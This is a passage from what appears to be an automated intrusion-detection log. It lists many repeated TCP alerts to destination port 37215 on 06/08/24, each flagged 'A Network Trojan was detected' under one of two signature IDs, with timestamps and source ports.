          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462920
          SID:2835222
          Source Port:60438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896047
          SID:2829579
          Source Port:33328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155691
          SID:2835222
          Source Port:45116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465350
          SID:2829579
          Source Port:33962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176797
          SID:2835222
          Source Port:58858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820867
          SID:2835222
          Source Port:59162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176176
          SID:2829579
          Source Port:51788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.088107
          SID:2835222
          Source Port:47542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.791975
          SID:2829579
          Source Port:35062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353046
          SID:2829579
          Source Port:50058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036193
          SID:2835222
          Source Port:53142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704757
          SID:2829579
          Source Port:57932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857914
          SID:2835222
          Source Port:49676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731790
          SID:2829579
          Source Port:35692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706025
          SID:2829579
          Source Port:56712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.849850
          SID:2835222
          Source Port:33692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016498
          SID:2835222
          Source Port:58500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800569
          SID:2829579
          Source Port:47898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175631
          SID:2835222
          Source Port:56980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466249
          SID:2835222
          Source Port:40760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444642
          SID:2835222
          Source Port:33982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.517270
          SID:2835222
          Source Port:34246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546700
          SID:2835222
          Source Port:39980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514059
          SID:2829579
          Source Port:41774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704866
          SID:2835222
          Source Port:58530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108620
          SID:2835222
          Source Port:38662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461741
          SID:2829579
          Source Port:39288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192545
          SID:2829579
          Source Port:44894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.844461
          SID:2829579
          Source Port:44394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108273
          SID:2835222
          Source Port:60658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.394395
          SID:2835222
          Source Port:37470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817155
          SID:2829579
          Source Port:46942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352037
          SID:2829579
          Source Port:38360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791924
          SID:2835222
          Source Port:44888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602861
          SID:2835222
          Source Port:33246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516527
          SID:2835222
          Source Port:55588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177687
          SID:2835222
          Source Port:46886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037294
          SID:2835222
          Source Port:37318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.302497
          SID:2829579
          Source Port:60754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135502
          SID:2835222
          Source Port:39618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266165
          SID:2835222
          Source Port:54840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075601
          SID:2829579
          Source Port:56686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516804
          SID:2835222
          Source Port:45678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781285
          SID:2829579
          Source Port:55124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.022214
          SID:2835222
          Source Port:37968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509119
          SID:2829579
          Source Port:45790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892402
          SID:2835222
          Source Port:55624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517863
          SID:2835222
          Source Port:48756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462899
          SID:2829579
          Source Port:58308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465113
          SID:2835222
          Source Port:51184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745568
          SID:2829579
          Source Port:58228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746010
          SID:2829579
          Source Port:33242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897832
          SID:2829579
          Source Port:38944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014573
          SID:2829579
          Source Port:53804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177987
          SID:2835222
          Source Port:36024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378538
          SID:2835222
          Source Port:40278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600306
          SID:2829579
          Source Port:35440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135537
          SID:2829579
          Source Port:34032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819001
          SID:2835222
          Source Port:60050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257676
          SID:2829579
          Source Port:40602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115691
          SID:2829579
          Source Port:58524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.045016
          SID:2829579
          Source Port:39020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549878
          SID:2835222
          Source Port:50120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262413
          SID:2829579
          Source Port:40482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274454
          SID:2835222
          Source Port:50942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731831
          SID:2829579
          Source Port:55460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448602
          SID:2835222
          Source Port:36166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460705
          SID:2835222
          Source Port:56262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175869
          SID:2835222
          Source Port:60922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241502
          SID:2829579
          Source Port:38204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126771
          SID:2829579
          Source Port:52632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513690
          SID:2829579
          Source Port:49374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.450004
          SID:2835222
          Source Port:37178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730735
          SID:2835222
          Source Port:57242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109126
          SID:2829579
          Source Port:60702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160179
          SID:2835222
          Source Port:53880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395340
          SID:2835222
          Source Port:50620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.861144
          SID:2829579
          Source Port:39266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132630
          SID:2829579
          Source Port:45408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787719
          SID:2835222
          Source Port:54684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.511544
          SID:2829579
          Source Port:51946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355542
          SID:2829579
          Source Port:45702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272383
          SID:2829579
          Source Port:34686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.172573
          SID:2829579
          Source Port:51764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111863
          SID:2829579
          Source Port:42378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461467
          SID:2829579
          Source Port:44570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264798
          SID:2829579
          Source Port:36170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705637
          SID:2829579
          Source Port:56522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.509951
          SID:2835222
          Source Port:34136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515699
          SID:2835222
          Source Port:37160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131948
          SID:2829579
          Source Port:48988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159240
          SID:2829579
          Source Port:33528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495733
          SID:2835222
          Source Port:34910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730441
          SID:2829579
          Source Port:52620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128717
          SID:2829579
          Source Port:36170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110483
          SID:2835222
          Source Port:45982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.150805
          SID:2829579
          Source Port:54892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.447029
          SID:2835222
          Source Port:33950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.303176
          SID:2829579
          Source Port:43492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.157942
          SID:2835222
          Source Port:51802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110256
          SID:2835222
          Source Port:33690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273569
          SID:2829579
          Source Port:59616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548095
          SID:2835222
          Source Port:38606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446510
          SID:2835222
          Source Port:52700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745463
          SID:2829579
          Source Port:32818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854610
          SID:2829579
          Source Port:34164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036515
          SID:2835222
          Source Port:46968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017755
          SID:2829579
          Source Port:54574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259735
          SID:2829579
          Source Port:56654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018171
          SID:2829579
          Source Port:37374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155389
          SID:2835222
          Source Port:36398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707596
          SID:2835222
          Source Port:53174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.150741
          SID:2835222
          Source Port:33896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743461
          SID:2829579
          Source Port:57984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017892
          SID:2829579
          Source Port:35406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788326
          SID:2835222
          Source Port:35484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551021
          SID:2835222
          Source Port:33212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355586
          SID:2829579
          Source Port:50804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667528
          SID:2829579
          Source Port:35796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130271
          SID:2835222
          Source Port:58220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178729
          SID:2829579
          Source Port:55208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174787
          SID:2835222
          Source Port:37286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600757
          SID:2835222
          Source Port:58084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888447
          SID:2835222
          Source Port:45980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351254
          SID:2829579
          Source Port:38846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175704
          SID:2829579
          Source Port:40034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513771
          SID:2835222
          Source Port:43640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897542
          SID:2835222
          Source Port:45140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352232
          SID:2829579
          Source Port:33532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792016
          SID:2835222
          Source Port:57742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781984
          SID:2835222
          Source Port:41318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406003
          SID:2829579
          Source Port:36026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274388
          SID:2829579
          Source Port:55410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108356
          SID:2829579
          Source Port:50626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257626
          SID:2829579
          Source Port:52034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514314
          SID:2835222
          Source Port:46300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461708
          SID:2829579
          Source Port:46214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.296701
          SID:2835222
          Source Port:38330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177426
          SID:2835222
          Source Port:40622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738828
          SID:2835222
          Source Port:44700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731594
          SID:2835222
          Source Port:58926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127531
          SID:2835222
          Source Port:59548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732364
          SID:2829579
          Source Port:37790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704595
          SID:2835222
          Source Port:42142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745410
          SID:2829579
          Source Port:34718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179104
          SID:2835222
          Source Port:52994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732198
          SID:2829579
          Source Port:34326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.085389
          SID:2835222
          Source Port:57796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.169339
          SID:2829579
          Source Port:58510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731108
          SID:2835222
          Source Port:36490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708085
          SID:2835222
          Source Port:59748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378414
          SID:2835222
          Source Port:59236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671555
          SID:2835222
          Source Port:57944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.187974
          SID:2835222
          Source Port:47702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.163334
          SID:2835222
          Source Port:36522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410837
          SID:2835222
          Source Port:56806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176069
          SID:2829579
          Source Port:39938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406262
          SID:2835222
          Source Port:43182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.804200
          SID:2835222
          Source Port:58862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355214
          SID:2829579
          Source Port:36238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153872
          SID:2835222
          Source Port:38242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162955
          SID:2835222
          Source Port:38962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262724
          SID:2835222
          Source Port:59704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.409874
          SID:2835222
          Source Port:57666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463355
          SID:2835222
          Source Port:50654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461760
          SID:2835222
          Source Port:33030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396105
          SID:2835222
          Source Port:39764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015402
          SID:2829579
          Source Port:34406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.146895
          SID:2829579
          Source Port:59404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407967
          SID:2829579
          Source Port:33348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896721
          SID:2829579
          Source Port:42514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513533
          SID:2829579
          Source Port:60616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791745
          SID:2829579
          Source Port:53874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158903
          SID:2829579
          Source Port:48704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460211
          SID:2829579
          Source Port:39154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707676
          SID:2829579
          Source Port:60378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667813
          SID:2835222
          Source Port:33590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019251
          SID:2829579
          Source Port:35898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272225
          SID:2835222
          Source Port:35922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407265
          SID:2829579
          Source Port:58094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.148512
          SID:2829579
          Source Port:56018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242879
          SID:2829579
          Source Port:42620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668202
          SID:2835222
          Source Port:43362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854653
          SID:2829579
          Source Port:37618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791592
          SID:2829579
          Source Port:49642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106488
          SID:2829579
          Source Port:58122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599735
          SID:2829579
          Source Port:50690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.165952
          SID:2835222
          Source Port:36124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179697
          SID:2829579
          Source Port:36664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242424
          SID:2835222
          Source Port:46606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673643
          SID:2829579
          Source Port:47124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356123
          SID:2829579
          Source Port:50384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353385
          SID:2829579
          Source Port:50924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510186
          SID:2829579
          Source Port:36482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177128
          SID:2829579
          Source Port:58920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672821
          SID:2835222
          Source Port:57866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264421
          SID:2835222
          Source Port:54598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
